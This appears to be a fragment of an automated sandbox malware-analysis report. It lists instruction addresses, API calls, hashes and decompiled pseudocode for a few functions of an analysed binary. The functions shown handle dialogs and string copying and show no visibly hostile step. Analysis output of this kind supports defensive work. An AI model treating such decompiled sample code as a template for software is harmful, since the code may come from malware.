                                                                                                                              0x004132c9
                                                                                                                              0x004132c9
                                                                                                                              0x004132cc
                                                                                                                              0x004132cc
                                                                                                                              0x004132d2
                                                                                                                              0x004132e2
                                                                                                                              0x004132e6
                                                                                                                              0x004132e9
                                                                                                                              0x004132e9
                                                                                                                              0x004132ef
                                                                                                                              0x004132f2
                                                                                                                              0x004132f4
                                                                                                                              0x004132f6
                                                                                                                              0x004132f7
                                                                                                                              0x004132fc
                                                                                                                              0x004132fc
                                                                                                                              0x004132ff
                                                                                                                              0x00413300
                                                                                                                              0x00413305
                                                                                                                              0x00413305
                                                                                                                              0x00413310
                                                                                                                              0x0041331f
                                                                                                                              0x0041331f
                                                                                                                              0x004131d6
                                                                                                                              0x004131da
                                                                                                                              0x004131df
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004131e5
                                                                                                                              0x004131e9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004131ef
                                                                                                                              0x004131f5
                                                                                                                              0x004131fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00413202
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00413208
                                                                                                                              0x0041320c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00413212
                                                                                                                              0x00413217
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00413219
                                                                                                                              0x0041321b
                                                                                                                              0x0041321f
                                                                                                                              0x00413224
                                                                                                                              0x00413227
                                                                                                                              0x0041322c
                                                                                                                              0x00413232
                                                                                                                              0x00413232
                                                                                                                              0x0041322e
                                                                                                                              0x0041322e
                                                                                                                              0x0041322e
                                                                                                                              0x0041323a
                                                                                                                              0x0041323b
                                                                                                                              0x00413242
                                                                                                                              0x00413247
                                                                                                                              0x0041326d
                                                                                                                              0x0041326d
                                                                                                                              0x00413273
                                                                                                                              0x0041327b
                                                                                                                              0x0041327d
                                                                                                                              0x0041327f
                                                                                                                              0x0041327f
                                                                                                                              0x00000000
                                                                                                                              0x00413249
                                                                                                                              0x00413249
                                                                                                                              0x0041324f
                                                                                                                              0x00413283
                                                                                                                              0x00413285
                                                                                                                              0x0041328a
                                                                                                                              0x00413292
                                                                                                                              0x00413292
                                                                                                                              0x00000000
                                                                                                                              0x00413251
                                                                                                                              0x00413255
                                                                                                                              0x00413267
                                                                                                                              0x00413269
                                                                                                                              0x00413269
                                                                                                                              0x00000000
                                                                                                                              0x00413267
                                                                                                                              0x0041324f

                                                                                                                              APIs
                                                                                                                              • SysStringLen.OLEAUT32(?), ref: 004131F6
                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 00413213
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041329C
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004132AD
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004132D8
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004132E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$DecrementFreeInterlocked
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3722612543-0
                                                                                                                              • Opcode ID: 89d0aaa3800d343f1c053d8b74ebe08b6d4b09729aa24eb1bd9164e0c0f1ee19
                                                                                                                              • Instruction ID: ffb7b5a83cc50cce1993d3311f1df6dc2ed6d11cd2888a2f4192bdda20e6fa37
                                                                                                                              • Opcode Fuzzy Hash: 89d0aaa3800d343f1c053d8b74ebe08b6d4b09729aa24eb1bd9164e0c0f1ee19
                                                                                                                              • Instruction Fuzzy Hash: D441B5B16043019BD710EF69CD84A9BB7E8AF44754F08096EF849D7350E738EA84CB69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00973172 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,00973169,00970D60,009705D5), ref: 00973180
                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0097318E
                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009731A7
                                                                                                                              • SetLastError.KERNEL32(00000000,00973169,00970D60,009705D5), ref: 009731F9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3852720340-0
                                                                                                                              • Opcode ID: 378d8ab8fa2481ca77521a1a3311705e7eaa1e925c3fa9baa4186c234c2169f9
                                                                                                                              • Instruction ID: b3ddfd62cb1e36fd41155cd3a28836b3208b28eb85a366e85d8cdf69e62bbc82
                                                                                                                              • Opcode Fuzzy Hash: 378d8ab8fa2481ca77521a1a3311705e7eaa1e925c3fa9baa4186c234c2169f9
                                                                                                                              • Instruction Fuzzy Hash: 3601F73322E3136EA7252BB47C87A1B2FA8DF927B5730C22DF618582E1EE515D017740
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00412470 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 215COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 71%
                                                                                                                              			E00412470(void* __ebx, void* __ebp, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				int _v4;
				char _v12;
				signed int _v16;
				char _v2064;
				char _v2080;
				char _v2092;
				char _v2096;
				char _v2120;
				char* _v2124;
				char* _v2128;
				char* _v2132;
				char* _v2136;
				char* _v2140;
				char* _v2144;
				char* _v2148;
				char* _v2152;
				char* _v2156;
				void* _v2160;
				int _v2164;
				intOrPtr _v2168;
				void* __edi;
				void* __esi;
				signed int _t54;
				signed int _t56;
				intOrPtr _t59;
				char _t60;
				signed int _t61;
				char _t62;
				char _t63;
				intOrPtr _t64;
				void* _t66;
				char _t73;
				char _t77;
				char _t80;
				struct HICON__* _t92;
				intOrPtr* _t98;
				char _t111;
				char _t112;
				intOrPtr _t113;
				void _t114;
				char _t115;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				void* _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				void* _t133;
				void* _t135;
				signed int _t136;
				intOrPtr _t139;
				void* _t140;

				_t134 = __ebp;
				_t101 = __ebx;
				_push(0xffffffff);
				_push(E00430B16);
				_push( *[fs:0x0]);
				_t136 = _t135 - 0x86c;
				_t54 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t54 ^ _t136;
				_t56 =  *0x43a6a8; // 0x2a5cd135
				_push(_t56 ^ _t136);
				 *[fs:0x0] =  &_v12;
				_t59 = _a8;
				_t140 = _t59 - 0x110;
				_t128 = _a4;
				_t132 = _a16;
				if(_t140 > 0) {
					_t60 = _t59 - 0x111;
					__eflags = _t60;
					if(_t60 == 0) {
						_t61 = _a12 & 0x0000ffff;
						__eflags = _t61 - 0x4e27;
						if(__eflags > 0) {
							_t62 = _t61 - 0x4e28;
							__eflags = _t62;
							if(_t62 == 0) {
								_t63 =  *0x43bedc; // 0x0
								__eflags = _t63;
								if(_t63 != 0) {
									_push("\\");
									__eflags =  *((intOrPtr*)(_t63 + 0xc)) + 4;
									_t66 = E00408450(__ebx,  &_v2120, __ebp,  &_v2120);
									_v4 = 0;
									E00408450(__ebx,  &_v2120, __ebp,  &_v2092);
									_v4 = 2;
									E00404600( &_v2120);
									_t139 = _t136 + 0x18 - 0x1c;
									_t125 =  &_v2092;
									_v2168 = _t139;
									E00401E60(_t139,  &_v2092);
									E00418E00( &_v2092, __ebp, _t128, L"help\\index.htm", _t66, L"hnv",  *((intOrPtr*)(_t63 + 0xc)) + 4);
									_t136 = _t139 + 0x24;
									E00404600( &_v2096);
								}
								L51:
								_t64 = 1;
								L52:
								 *[fs:0x0] = _v12;
								_pop(_t129);
								_pop(_t133);
								return E0041B3F9(_t64, _t101, _v16 ^ _t136, _t125, _t129, _t133);
							}
							_t73 = _t62 - 0x4e1b;
							__eflags = _t73;
							if(_t73 == 0) {
								L47:
								_t111 =  *0x43bedc; // 0x0
								__eflags = _t111;
								if(_t111 != 0) {
									E00411130(_t101, _t134);
								}
								goto L51;
							}
							__eflags = _t73 == 1;
							if(_t73 == 1) {
								_t112 =  *0x43bedc; // 0x0
								__eflags = _t112;
								if(_t112 != 0) {
									E0040F0C0(__ebx, __ebp);
								}
							}
							goto L51;
						}
						if(__eflags == 0) {
							goto L47;
						}
						_t77 = _t61 - 2;
						__eflags = _t77;
						if(_t77 == 0) {
							_t113 =  *0x43bedc; // 0x0
							E0040F190(_t77, _t113, _t125);
							EndDialog(_t128, 0);
						} else {
							_t80 = _t77 - 0x71;
							__eflags = _t80;
							if(_t80 == 0) {
								_t114 =  *0x43bedc; // 0x0
								__eflags = _t114;
								if(_t114 != 0) {
									E00410ED0(_t114, _t125);
								}
							} else {
								__eflags = _t80 == 1;
								if(_t80 == 1) {
									_t115 =  *0x43bedc; // 0x0
									__eflags = _t115;
									if(__eflags != 0) {
										E0040F330(__ebx, _t115, __eflags);
									}
								}
							}
						}
						goto L51;
					}
					__eflags = _t60 == 2;
					if(_t60 == 2) {
						L31:
						E0040FE50(1);
						goto L51;
					}
					L30:
					_t64 = 0;
					goto L52;
				}
				if(_t140 == 0) {
					 *0x43e000 = _t128;
					 *0x43bedc = _t132;
					E00411430(_t132, __eflags, _t128);
					goto L51;
				}
				if(_t59 == 0x10) {
					_t118 =  *0x43bedc; // 0x0
					__eflags =  *((char*)(_t118 + 0x28));
					if( *((char*)(_t118 + 0x28)) == 0) {
						E0040F190(_t59, _t118, _t125);
						EndDialog(_t128, 0);
					}
					goto L51;
				}
				if(_t59 != 0x4e) {
					goto L30;
				}
				_v2164 = 0;
				if( *((intOrPtr*)(_t132 + 4)) != 0x6f) {
					goto L31;
				}
				_t130 = _t59 - 0x4c;
				if( *((intOrPtr*)(_t132 + 8)) != 0xffffff87) {
					L16:
					if( *((intOrPtr*)(_t132 + 8)) == 0xfffffffe) {
						_t120 =  *0x43bedc; // 0x0
						if( *((intOrPtr*)(_t120 + 8)) != 0 &&  *((intOrPtr*)(_t132 + 0x10)) == _t130) {
							_t154 =  *((intOrPtr*)(_t132 + 0xc)) - 0xffffffff;
							if( *((intOrPtr*)(_t132 + 0xc)) != 0xffffffff) {
								_push( &_v2164);
								_push(_t132);
								E004111D0(_t120, _t154);
							}
						}
					}
					if( *((intOrPtr*)(_t132 + 8)) == 0xffffff9b &&  *((intOrPtr*)(_t132 + 0x1c)) != 0) {
						_t157 =  *((intOrPtr*)(_t132 + 0x10));
						if( *((intOrPtr*)(_t132 + 0x10)) == 0) {
							_t119 =  *0x43bedc; // 0x0
							E0040F750(_t101, _t119, _t157, _t132);
						}
					}
					goto L51;
				}
				_t121 =  *((intOrPtr*)(_t132 + 0xc));
				if(_t121 == 0xffffffff) {
					goto L51;
				}
				if( *((intOrPtr*)(_t132 + 0x10)) != _t130) {
					_push(0x7f00);
					L14:
					_t92 =  *0x43bab4(0);
					if(_t92 != 0) {
						SetCursor(_t92);
					}
					goto L16;
				}
				_t125 =  *0x43bedc; // 0x0
				_v2156 = 0;
				_v2156 = _t121;
				_push( &_v2160);
				_v2160 = 0;
				_v2152 = 0;
				_v2140 = 0;
				_v2136 = 0;
				_v2148 = 0;
				_v2144 = 0;
				_v2132 = 0;
				_v2128 = 0;
				_v2124 = 0;
				_push(0);
				_push(0x104b);
				_v2152 = _t130;
				_v2160 = 1;
				_v2140 =  &_v2064;
				_v2136 = 0x400;
				_push(E00403C60( *((intOrPtr*)(_t125 + 8))));
				if( *0x43babc() == 0) {
					goto L51;
				} else {
					_t98 =  &_v2080;
					_t125 = _t98 + 2;
					do {
						_t124 =  *_t98;
						_t98 = _t98 + _t130;
					} while (_t124 != 0);
					if(_t98 == _t125) {
						goto L16;
					} else {
						_push(0x7f89);
						goto L14;
					}
				}
			}


























































                                                                                                                              0x00412470
                                                                                                                              0x00412470
                                                                                                                              0x00412470
                                                                                                                              0x00412472
                                                                                                                              0x0041247d
                                                                                                                              0x0041247e
                                                                                                                              0x00412484
                                                                                                                              0x0041248b
                                                                                                                              0x00412494
                                                                                                                              0x0041249b
                                                                                                                              0x004124a3
                                                                                                                              0x004124a9
                                                                                                                              0x004124b0
                                                                                                                              0x004124b5
                                                                                                                              0x004124bc
                                                                                                                              0x004124c3
                                                                                                                              0x00412652
                                                                                                                              0x00412652
                                                                                                                              0x00412657
                                                                                                                              0x00412677
                                                                                                                              0x0041267f
                                                                                                                              0x00412684
                                                                                                                              0x004126e8
                                                                                                                              0x004126e8
                                                                                                                              0x004126ed
                                                                                                                              0x0041272c
                                                                                                                              0x00412731
                                                                                                                              0x00412733
                                                                                                                              0x00412738
                                                                                                                              0x0041273d
                                                                                                                              0x00412746
                                                                                                                              0x00412756
                                                                                                                              0x00412761
                                                                                                                              0x0041276d
                                                                                                                              0x00412775
                                                                                                                              0x0041277f
                                                                                                                              0x00412782
                                                                                                                              0x00412788
                                                                                                                              0x0041278d
                                                                                                                              0x00412793
                                                                                                                              0x00412798
                                                                                                                              0x0041279f
                                                                                                                              0x0041279f
                                                                                                                              0x004127a4
                                                                                                                              0x004127a4
                                                                                                                              0x004127a9
                                                                                                                              0x004127b0
                                                                                                                              0x004127b8
                                                                                                                              0x004127b9
                                                                                                                              0x004127ce
                                                                                                                              0x004127ce
                                                                                                                              0x004126ef
                                                                                                                              0x004126ef
                                                                                                                              0x004126f4
                                                                                                                              0x00412717
                                                                                                                              0x00412717
                                                                                                                              0x0041271d
                                                                                                                              0x0041271f
                                                                                                                              0x00412725
                                                                                                                              0x00412725
                                                                                                                              0x00000000
                                                                                                                              0x0041271f
                                                                                                                              0x004126f6
                                                                                                                              0x004126f9
                                                                                                                              0x004126ff
                                                                                                                              0x00412705
                                                                                                                              0x00412707
                                                                                                                              0x0041270d
                                                                                                                              0x0041270d
                                                                                                                              0x00412707
                                                                                                                              0x00000000
                                                                                                                              0x004126f9
                                                                                                                              0x00412686
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041268c
                                                                                                                              0x0041268c
                                                                                                                              0x0041268f
                                                                                                                              0x004126cf
                                                                                                                              0x004126d5
                                                                                                                              0x004126dd
                                                                                                                              0x00412691
                                                                                                                              0x00412691
                                                                                                                              0x00412691
                                                                                                                              0x00412694
                                                                                                                              0x004126b7
                                                                                                                              0x004126bd
                                                                                                                              0x004126bf
                                                                                                                              0x004126c5
                                                                                                                              0x004126c5
                                                                                                                              0x00412696
                                                                                                                              0x00412696
                                                                                                                              0x00412699
                                                                                                                              0x0041269f
                                                                                                                              0x004126a5
                                                                                                                              0x004126a7
                                                                                                                              0x004126ad
                                                                                                                              0x004126ad
                                                                                                                              0x004126a7
                                                                                                                              0x00412699
                                                                                                                              0x00412694
                                                                                                                              0x00000000
                                                                                                                              0x0041268f
                                                                                                                              0x00412659
                                                                                                                              0x0041265c
                                                                                                                              0x00412665
                                                                                                                              0x0041266d
                                                                                                                              0x00000000
                                                                                                                              0x0041266d
                                                                                                                              0x0041265e
                                                                                                                              0x0041265e
                                                                                                                              0x00000000
                                                                                                                              0x0041265e
                                                                                                                              0x004124c9
                                                                                                                              0x0041263c
                                                                                                                              0x00412642
                                                                                                                              0x00412648
                                                                                                                              0x00000000
                                                                                                                              0x00412648
                                                                                                                              0x004124d2
                                                                                                                              0x00412616
                                                                                                                              0x0041261c
                                                                                                                              0x00412620
                                                                                                                              0x00412626
                                                                                                                              0x0041262e
                                                                                                                              0x0041262e
                                                                                                                              0x00000000
                                                                                                                              0x00412620
                                                                                                                              0x004124db
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004124e5
                                                                                                                              0x004124ed
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004124f7
                                                                                                                              0x004124fa
                                                                                                                              0x004125bf
                                                                                                                              0x004125c3
                                                                                                                              0x004125c5
                                                                                                                              0x004125cf
                                                                                                                              0x004125d6
                                                                                                                              0x004125da
                                                                                                                              0x004125e0
                                                                                                                              0x004125e1
                                                                                                                              0x004125e2
                                                                                                                              0x004125e2
                                                                                                                              0x004125da
                                                                                                                              0x004125cf
                                                                                                                              0x004125eb
                                                                                                                              0x004125fb
                                                                                                                              0x004125ff
                                                                                                                              0x00412605
                                                                                                                              0x0041260c
                                                                                                                              0x0041260c
                                                                                                                              0x004125ff
                                                                                                                              0x00000000
                                                                                                                              0x004125eb
                                                                                                                              0x00412500
                                                                                                                              0x00412506
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041250f
                                                                                                                              0x004125a7
                                                                                                                              0x004125ac
                                                                                                                              0x004125ae
                                                                                                                              0x004125b6
                                                                                                                              0x004125b9
                                                                                                                              0x004125b9
                                                                                                                              0x00000000
                                                                                                                              0x004125b6
                                                                                                                              0x00412515
                                                                                                                              0x0041251d
                                                                                                                              0x00412521
                                                                                                                              0x00412529
                                                                                                                              0x0041252d
                                                                                                                              0x00412531
                                                                                                                              0x00412535
                                                                                                                              0x00412539
                                                                                                                              0x0041253d
                                                                                                                              0x00412541
                                                                                                                              0x00412545
                                                                                                                              0x00412549
                                                                                                                              0x0041254d
                                                                                                                              0x00412551
                                                                                                                              0x00412557
                                                                                                                              0x0041255c
                                                                                                                              0x00412560
                                                                                                                              0x00412568
                                                                                                                              0x0041256c
                                                                                                                              0x00412579
                                                                                                                              0x00412582
                                                                                                                              0x00000000
                                                                                                                              0x00412588
                                                                                                                              0x00412588
                                                                                                                              0x0041258c
                                                                                                                              0x00412590
                                                                                                                              0x00412590
                                                                                                                              0x00412593
                                                                                                                              0x00412595
                                                                                                                              0x0041259e
                                                                                                                              0x00000000
                                                                                                                              0x004125a0
                                                                                                                              0x004125a0
                                                                                                                              0x00000000
                                                                                                                              0x004125a0
                                                                                                                              0x0041259e

                                                                                                                              APIs
                                                                                                                              • SetCursor.USER32(00000000), ref: 004125B9
                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0041262E
                                                                                                                              • EndDialog.USER32(?,00000000), ref: 004126DD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Dialog$Cursor
                                                                                                                              • String ID: help\index.htm$hnv
                                                                                                                              • API String ID: 2351788643-3750647359
                                                                                                                              • Opcode ID: 163a5649151c3389bbcdc601e1dd3e05c3b5b2e034b3ce343dc1e42fb0f4a319
                                                                                                                              • Instruction ID: 1fb04f7b2cdd114d5f214ce3eec46a3ba1a31fc18fce8b8b542f9b9e4b183997
                                                                                                                              • Opcode Fuzzy Hash: 163a5649151c3389bbcdc601e1dd3e05c3b5b2e034b3ce343dc1e42fb0f4a319
                                                                                                                              • Instruction Fuzzy Hash: F881A174104341AFC728DF29CA557ABB6E1FF84324F144A2FE199C66D0DBF99890CB4A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413580 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00413580() {
				void* __edi;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int* _t59;
				signed int* _t60;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				void* _t83;

				_t55 =  *(_t83 + 0x1c);
				_t81 =  *(_t83 + 0x14);
				_t80 =  *(_t83 + 0x14);
				 *(_t83 + 0x10) = 0;
				_t79 = _t80;
				 *(_t83 + 0x18) = 0;
				if((_t55 & 0xffffe000) == 0) {
					__eflags = _t55 & 0x00000100;
					if((_t55 & 0x00000100) == 0) {
						_t56 =  *(_t83 + 0x30);
						L12:
						__eflags = _t81;
						if(_t81 != 0) {
							_t18 = _t81 - 1; // -1
							_t68 = _t18;
							_t57 = E0041BDD8(_t80, _t81, _t68, _t56,  *((intOrPtr*)(_t83 + 0x34)));
							_t83 = _t83 + 0x14;
							__eflags = _t57;
							if(_t57 >= 0) {
								__eflags = _t57 - _t68;
								if(__eflags <= 0) {
									if(__eflags != 0) {
										__eflags = _t57 - _t68;
										if(_t57 < _t68) {
											_t82 = _t81 - _t57;
											_t79 = _t80 + _t57 * 2;
											_t64 =  *(_t83 + 0x2c);
											__eflags = _t64 & 0x00000200;
											 *(_t83 + 0x18) = _t81 - _t57;
											if((_t64 & 0x00000200) != 0) {
												_t32 = _t79 + 2; // 0x2
												E0041B880(_t79, _t32, _t64 & 0x000000ff, ( *(_t83 + 0x20) & 0x00000001) + _t82 * 2 - 2);
												_t83 = _t83 + 0xc;
											}
										}
									} else {
										_t79 = _t80 + _t68 * 2;
										 *(_t83 + 0x18) = 1;
										 *_t79 = 0;
									}
									goto L36;
								}
							}
							_t79 = _t80 + _t68 * 2;
							 *(_t83 + 0x18) = 1;
							 *_t79 = 0;
							goto L24;
						} else {
							__eflags =  *_t56;
							 *(_t83 + 0x18) = 0;
							if( *_t56 == 0) {
								goto L36;
							}
							__eflags = _t80;
							if(_t80 != 0) {
								L24:
								 *(_t83 + 0x10) = 0x8007007a;
								goto L25;
							} else {
								return 0x80070057;
							}
						}
					} else {
						__eflags = _t80;
						if(_t80 == 0) {
							__eflags = _t81;
							if(_t81 != 0) {
								L6:
								 *(_t83 + 0x10) = 0x80070057;
							} else {
								__eflags =  *(_t83 + 0x20);
								if( *(_t83 + 0x20) != 0) {
									goto L6;
								}
							}
						}
						_t56 =  *(_t83 + 0x30);
						__eflags = _t56;
						if(_t56 == 0) {
							_t56 = 0x432444;
						}
						__eflags =  *(_t83 + 0x10);
						if( *(_t83 + 0x10) < 0) {
							goto L25;
						} else {
							goto L12;
						}
					}
				} else {
					 *(_t83 + 0x10) = 0x80070057;
					L25:
					if(_t80 != 0) {
						_t69 =  *(_t83 + 0x2c);
						if((_t69 & 0x00000400) != 0) {
							_t70 = _t69 & 0x000000ff;
							E0041B880(_t79, _t80, _t70,  *(_t83 + 0x20));
							_t83 = _t83 + 0xc;
							if(_t70 != 0) {
								__eflags = _t81;
								if(_t81 > 0) {
									_t43 = _t81 * 2; // -2
									_t79 = _t80 + _t43 - 2;
									 *(_t83 + 0x18) = 1;
									 *_t79 = 0;
								}
							} else {
								_t79 = _t80;
								 *(_t83 + 0x18) = _t81;
							}
						}
						if(( *(_t83 + 0x2c) & 0x00001800) != 0 && _t81 > 0) {
							_t79 = _t80;
							 *(_t83 + 0x18) = _t81;
							 *_t80 = 0;
						}
					}
					_t58 =  *(_t83 + 0x10);
					if(_t58 >= 0 || _t58 == 0x8007007a) {
						L36:
						_t59 =  *(_t83 + 0x24);
						if(_t59 != 0) {
							 *_t59 = _t79;
						}
						_t60 =  *(_t83 + 0x28);
						if(_t60 != 0) {
							 *_t60 =  *(_t83 + 0x18);
						}
						return  *(_t83 + 0x10);
					}
					return _t58;
				}
			}


















                                                                                                                              0x00413581
                                                                                                                              0x00413587
                                                                                                                              0x0041358c
                                                                                                                              0x00413598
                                                                                                                              0x0041359c
                                                                                                                              0x0041359e
                                                                                                                              0x004135a2
                                                                                                                              0x004135b1
                                                                                                                              0x004135b6
                                                                                                                              0x004135e7
                                                                                                                              0x004135eb
                                                                                                                              0x004135eb
                                                                                                                              0x004135ed
                                                                                                                              0x00413617
                                                                                                                              0x00413617
                                                                                                                              0x0041361d
                                                                                                                              0x00413622
                                                                                                                              0x00413625
                                                                                                                              0x00413627
                                                                                                                              0x00413629
                                                                                                                              0x0041362b
                                                                                                                              0x0041362d
                                                                                                                              0x00413644
                                                                                                                              0x00413646
                                                                                                                              0x0041364c
                                                                                                                              0x0041364e
                                                                                                                              0x00413651
                                                                                                                              0x00413655
                                                                                                                              0x0041365a
                                                                                                                              0x0041365e
                                                                                                                              0x00413678
                                                                                                                              0x0041367c
                                                                                                                              0x00413681
                                                                                                                              0x00413681
                                                                                                                              0x0041365e
                                                                                                                              0x0041362f
                                                                                                                              0x0041362f
                                                                                                                              0x00413632
                                                                                                                              0x0041363a
                                                                                                                              0x0041363a
                                                                                                                              0x00000000
                                                                                                                              0x0041362d
                                                                                                                              0x0041362b
                                                                                                                              0x00413689
                                                                                                                              0x0041368c
                                                                                                                              0x00413694
                                                                                                                              0x00000000
                                                                                                                              0x004135ef
                                                                                                                              0x004135ef
                                                                                                                              0x004135f2
                                                                                                                              0x004135f6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004135fc
                                                                                                                              0x004135fe
                                                                                                                              0x00413699
                                                                                                                              0x00413699
                                                                                                                              0x00000000
                                                                                                                              0x00413607
                                                                                                                              0x0041360e
                                                                                                                              0x0041360e
                                                                                                                              0x004135fe
                                                                                                                              0x004135b8
                                                                                                                              0x004135b8
                                                                                                                              0x004135ba
                                                                                                                              0x004135bc
                                                                                                                              0x004135be
                                                                                                                              0x004135c6
                                                                                                                              0x004135c6
                                                                                                                              0x004135c0
                                                                                                                              0x004135c0
                                                                                                                              0x004135c4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004135c4
                                                                                                                              0x004135be
                                                                                                                              0x004135ce
                                                                                                                              0x004135d2
                                                                                                                              0x004135d4
                                                                                                                              0x004135d6
                                                                                                                              0x004135d6
                                                                                                                              0x004135db
                                                                                                                              0x004135df
                                                                                                                              0x00000000
                                                                                                                              0x004135e5
                                                                                                                              0x00000000
                                                                                                                              0x004135e5
                                                                                                                              0x004135df
                                                                                                                              0x004135a4
                                                                                                                              0x004135a4
                                                                                                                              0x004136a1
                                                                                                                              0x004136a3
                                                                                                                              0x004136a5
                                                                                                                              0x004136af
                                                                                                                              0x004136b6
                                                                                                                              0x004136be
                                                                                                                              0x004136c3
                                                                                                                              0x004136c8
                                                                                                                              0x004136d2
                                                                                                                              0x004136d4
                                                                                                                              0x004136d6
                                                                                                                              0x004136d6
                                                                                                                              0x004136da
                                                                                                                              0x004136e2
                                                                                                                              0x004136e2
                                                                                                                              0x004136ca
                                                                                                                              0x004136ca
                                                                                                                              0x004136cc
                                                                                                                              0x004136cc
                                                                                                                              0x004136c8
                                                                                                                              0x004136ef
                                                                                                                              0x004136f5
                                                                                                                              0x004136f7
                                                                                                                              0x004136fb
                                                                                                                              0x004136fb
                                                                                                                              0x004136ef
                                                                                                                              0x00413700
                                                                                                                              0x00413706
                                                                                                                              0x0041370f
                                                                                                                              0x0041370f
                                                                                                                              0x00413715
                                                                                                                              0x00413717
                                                                                                                              0x00413717
                                                                                                                              0x00413719
                                                                                                                              0x0041371f
                                                                                                                              0x00413725
                                                                                                                              0x00413725
                                                                                                                              0x00000000
                                                                                                                              0x00413727
                                                                                                                              0x00413730
                                                                                                                              0x00413730

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: D$C$z
                                                                                                                              • API String ID: 2102423945-2011528160
                                                                                                                              • Opcode ID: a4b21570df4506459b64e77bf585a2c123aaad5ed9740a2af35b95a2abfb9ebf
